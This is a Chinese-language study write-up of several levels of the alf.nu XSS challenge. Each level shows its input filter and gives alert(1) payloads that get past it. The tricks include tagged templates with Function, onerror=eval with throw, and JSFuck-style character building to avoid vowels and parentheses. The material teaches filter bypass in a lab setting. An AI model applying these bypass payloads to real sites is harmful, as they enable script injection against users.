【第二十六天 - XSS Lab(2)-4】

Q1. XSS Lab(2)-4

题目：https://alf.nu/alert1

Well
- 题目：
```
function escape(s) {
  http://www.avlidienbrunn.se/xsschallenge/

  s = s.replace(/[\r\n\u2028\u2029\\;,()\[\]<]/g, '');
  return "<script> var email = '" + s + "'; <\/script>";
}
```
- 由於题目有限制无法使用 ()，我们可以使用 String.fromCharCode40与 `String.fromCharCode`41 替代 ()
- ANS
  - '+{valueOf:Function`baba${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`}//
  - '+{toString:Function`baba${'alert'+String.fromCharCode`40`+1+String.fromCharCode`41`}`}//
No
- 此题无法用 firefox，可以使用 chrome
- 题目：
```
// submitted by Stephen Leppik

function escape(s) {
    s = s.replace(/[()`<]/g, ''); // no function calls

    return '<script>\n' +
           'var string = "' + s + '";\n' +
           'console.log(string);\n' +
           '</script>';
}
```
  - 本题会将输入值中的 ()<` 去除。
- 解题：
  - window.onerror 是 JavaScript 在 runtime error 时，会触发的错误处理函数
  - 我们可利用 eval 覆盖 onerror 函数，再用 throw 手动触发错误。
- ANS: ";onerror=eval;throw'=alert\x281\x29';//
K'Z'K (1)
- 题目：
```
// submitted by Stephen Leppik
function escape(s) {
    // remove vowels in honor of K'Z'K the Destroyer
    s = s.replace(/[aeiouy]/gi, '');
    return '<script>console.log("' + s + '");</script>';
}
```
  - 本题会将所有母音删除
- 解题：
  - 本题可以利用 JSFuck 中的原理，例如以下 JS 特性：
    - 使用 function constructor 代替 eval
      - 例如：[]["p\x6fp"]["c\x6fnstr\x75ct\x6fr"] 会得到 function constructor
    - 利用不同 type 制造字串，再取其中的字元
      - 例如： ''+!1+!0+{}[0]+{} 会得到 "falsetrueundefined[object Object]"
- ANS：
  - ");[]["p\x6fp"]["c\x6fnstr\x75ct\x6fr"]('\x61l\x65rt(1)')()//
  - ");_=''+!1+!0+{}[0]+{};[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//
  - ");[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])//

K'Z'K (2)

题目：

function escape(s) {
    // remove vowels and escape sequences in honor of K'Z'K 
    // y is only sometimes a vowel, so it's only removed as a literal
    s = s.replace(/[aeiouy]|\\((x|u00)([46][159f]|[57]5)|1([04][15]|[15][17]|[26]5))/gi, '')
    // remove certain characters that can be used to get vowels
    s = s.replace(/[{}!=<>]/g, '');
    return '<script>console.log("' + s + '");</script>';
}

本题过滤母音、或 \((x|u00)([46][159f]|[57]5)|1([04][15]|[15][17]|[26]5
- 例如 \x6f 会被替换成空字串
- \ \x6f x6f 只有一个连续字元为 \x6f，所以当 \x6f 替换为空字串时，剩下的字串会组成 \x6f
- ANS
  - ");[]["p\\x6fx6fp"]["c\\x6fx6fnstr\\x75x75ct\\x6fx6fr"]('\\x61x61l\\x65x65rt(1)')()//

K'Z'K (3)
- 题目：
```
// submitted by Stephen Leppik
function escape(s) {
    // remove vowels in honor of K'Z'K the Destroyer
    s = s.replace(/[aeiouy]/gi, '');
    // remove certain characters that can be used to get vowels
    s = s.replace(/[{}!=<>\\]/g, '');
    return '<script>console.log("' + s + '");</script>';
}
```
  - 本题除了过滤母音，还将 {}!=<>\ 也过滤了
  - 由於过滤了 ! ，本题无法直接使用 JSFuck
  - 由於过滤了 \ ，因此也无法在字串中用 Hex 或 Oct 代替母音
- 解题：
  - 虽然无法用 ! ，但所需的字元依然可以取得，例如：
    - ''+[][[]] : 'undefined' ，可以取得 e i u
    - +[][[]]+'' : 'NaN' ，可以取得 a
    - [][(+[][[]]+'')[1] + 't']+'' :
```
"function at() {
    [native code]
}"
```
      可以取得 o
  - 如此一来， 'c' + ([][(+[][[]]+'')[1] + 't']+'')[6]+ 'nstr' + (''+[][[]])[0] + 'ct' + ([][(+[][[]]+'')[1] + 't']+'')[6] + 'r' 就构成了 constructor ，而 (+[][[]]+'')[1] + 'l' + (''+[][[]])[3] + 'rt(1)' 就构成了 alert(1)
- ANS:
  - ");[][(+[][[]]+'')[1]+'t']['c'+([][(+[][[]]+'')[1]+'t']+'')[6]+'nstr'+(''+[][[]])[0]+'ct'+([][(+[][[]]+'')[1]+'t']+'')[6]+'r']((+[][[]]+'')[1]+'l'+(''+[][[]])[3] + 'rt(1)')()//
  - ");[]['m'+(++[][[]]+[])[1]+'p']['c'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'nstr'+([][[]]+[])[0]+'ct'+([]['m'+(++[][[]]+[])[1]+'p']+[])[6]+'r']((++[][[]]+[])[1]+'l'+([][[]]+[])[3]+'rt(1)')()//